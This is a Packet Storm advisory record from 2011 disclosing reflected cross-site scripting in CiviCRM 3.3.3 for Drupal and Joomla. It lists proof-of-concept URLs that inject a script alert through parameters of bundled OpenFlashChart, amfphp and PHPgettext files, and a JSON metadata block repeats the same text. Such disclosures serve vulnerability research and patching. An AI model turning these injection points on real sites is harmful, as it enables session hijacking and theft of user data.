ID PACKETSTORM:98246
Type packetstorm
Reporter AutoSec Tools
Modified 2011-02-07T00:00:00
Description
`------------------------------------------------------------------------
Software................CiviCRM 3.3.3 Drupal-Joomla
Vulnerability...........Reflected Cross-site Scripting
Download................http://civicrm.org/
Release Date............2/2/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------
--Description--
A reflected cross-site scripting vulnerability in CiviCRM 3.3.3
Drupal-Joomla can be exploited to execute arbitrary JavaScript.
--PoC--
Drupal:
http://localhost/drupal-6.20/sites/all/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?defaultPath=%3Cscript%3Ealert(0)%3C/script%3E
http://localhost/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/code.php?class=%3Cscript%3Ealert(0)%3C/script%3E
http://localhost/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/details.php?class=<script>alert(0)</script>
http://localhost/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/methodTable.php?class=%3Cscript%3Ealert(0)%3C/script%3E
Joomla:
http://localhost/joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?defaultPath=%3Cscript%3Ealert(0)%3C/script%3E
http://localhost/joomla/administrator/components/com_civicrm/civicrm/packages/amfphp/browser/methodTable.php?class=%3Cscript%3Ealert(0)%3C/script%3E
http://localhost/joomla/administrator/components/com_civicrm/civicrm/packages/PHPgettext/examples/pigs_dropin.php?lang=0%3Cscript%3Ealert(0)%3C/script%3E
http://localhost/joomla/administrator/components/com_civicrm/civicrm/packages/PHPgettext/examples/pigs_fallback.php?lang=%3Cscript%3Ealert(0)%3C/script%3E
`
{"type": "packetstorm", "published": "2011-02-07T00:00:00", "reporter": "AutoSec Tools", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "ded694091ac072ec5777aa6a84837b53"}, {"key": "modified", "hash": "28a4c858e3281ca6a69425233cefc2bd"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "28a4c858e3281ca6a69425233cefc2bd"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "7a4b1ae1df1e22a0aed5223533d754fb"}, {"key": "sourceData", "hash": "b9abb870e281306cc50450c6c14e772f"}, {"key": "sourceHref", "hash": "45cd2c144d8467dc2e88dcbcda564344"}, {"key": "title", "hash": "54ce397c3966d21ce5af37653f2dcffc"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`------------------------------------------------------------------------ \nSoftware................CiviCRM 3.3.3 Drupal-Joomla \nVulnerability...........Reflected Cross-site Scripting \nDownload................http://civicrm.org/ \nRelease Date............2/2/2011 \nTested On...............Windows Vista + XAMPP \n------------------------------------------------------------------------ \nAuthor..................AutoSec Tools \nSite....................http://www.autosectools.com/ \n------------------------------------------------------------------------ \n \n--Description-- \n \nA reflected cross-site scripting vulnerability in CiviCRM 3.3.3 \nDrupal-Joomla can be exploited to execute arbitrary JavaScript. \n \n \n--PoC-- \n \nDrupal: \n \nhttp://localhost/drupal-6.20/sites/all/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?defaultPath=%3Cscript%3Ealert(0)%3C/script%3E \n \nhttp://localhost/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/code.php?class=%3Cscript%3Ealert(0)%3C/script%3E \n \nhttp://localhost/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/details.php?class=<script>alert(0)</script> \n \nhttp://localhost/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/methodTable.php?class=%3Cscript%3Ealert(0)%3C/script%3E \n \n \nJoomla: \n \nhttp://localhost/joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?defaultPath=%3Cscript%3Ealert(0)%3C/script%3E \n \nhttp://localhost/joomla/administrator/components/com_civicrm/civicrm/packages/amfphp/browser/methodTable.php?class=%3Cscript%3Ealert(0)%3C/script%3E \n \nhttp://localhost/joomla/administrator/components/com_civicrm/civicrm/packages/PHPgettext/examples/pigs_dropin.php?lang=0%3Cscript%3Ealert(0)%3C/script%3E \n \nhttp://localhost/joomla/administrator/components/com_civicrm/civicrm/packages/PHPgettext/examples/pigs_fallback.php?lang=%3Cscript%3Ealert(0)%3C/script%3E \n`\n", "viewCount": 3, "history": [], "lastseen": "2016-11-03T10:22:15", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/98246/CiviCRM-3.3.3-Drupal-Joomla-Cross-Site-Scripting.html", "sourceHref": "https://packetstormsecurity.com/files/download/98246/CiviCRM3.3.3Drupal-Joomla.txt", "title": "CiviCRM 3.3.3 Drupal-Joomla Cross Site Scripting", "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2016-11-03T10:22:15"}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:15"}, "vulnersScore": 0.1}, "references": [], "id": "PACKETSTORM:98246", "hash": "7f82fe06d709f24f122858b6b9197aad579ba6ea4c5b3908cda07508190c9bac", "edition": 1, "cvelist": [], "modified": "2011-02-07T00:00:00", "description": ""}
{}